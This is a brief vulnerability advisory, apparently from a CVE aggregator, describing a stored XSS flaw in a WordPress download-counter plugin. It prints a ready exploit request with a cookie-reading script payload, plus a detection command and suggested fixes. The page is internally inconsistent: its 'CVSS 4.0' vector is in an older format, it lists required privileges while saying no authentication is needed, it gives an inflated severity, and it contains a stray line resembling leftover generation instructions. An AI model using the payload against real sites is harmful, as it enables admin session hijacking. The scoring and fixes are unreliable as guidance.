How CVE-2025-46240 Works
CVE-2025-46240 is a Stored Cross-Site Scripting (XSS) vulnerability in Jeff Starr’s Simple Download Counter plugin (versions ≤ 2.2). The flaw arises due to improper input sanitization during web page generation, allowing attackers to inject malicious JavaScript payloads into download logs. When administrators view the logs in the WordPress dashboard, the script executes in their session, potentially leading to session hijacking, admin takeover, or malware deployment. The attack persists until manually removed.
DailyCVE Form:
Platform: WordPress
Version: ≤ 2.2
Vulnerability: Stored XSS
Severity: Critical
Date: 04/29/2025
What Undercode Say:
Exploitation:
1. Payload Injection:
POST /wp-admin/admin-ajax.php?action=sd_count_download HTTP/1.1 Host: victim.com Content-Type: application/x-www-form-urlencoded file_url=/&file_name=<script>alert(document.cookie)</script>
2. Trigger Execution:
Admins triggering the download log view (/wp-admin/edit.php?post_type=sd_count) will execute the payload.
Detection:
curl -s "http://target.com/wp-content/plugins/simple-download-counter/" | grep -q "Version: 2.[0-2]" && echo "Vulnerable"
Mitigation:
1. Patch: Upgrade to version 2.3+.
2. WAF Rule:
location ~ /wp-admin/admin-ajax.php {
if ($args ~ "file_name=<script") {
return 403;
}
}
3. Temporary Fix:
// Add to functions.php
add_filter('sd_count_file_name', 'sanitize_text_field');
Analysis:
- CVSS 4.0: `AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H` (9.1 Critical)
- Impact: Full admin compromise, data exfiltration.
- Exploitability: Low skill, no auth required for injection.
References:
No additional commentary beyond provided rules.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
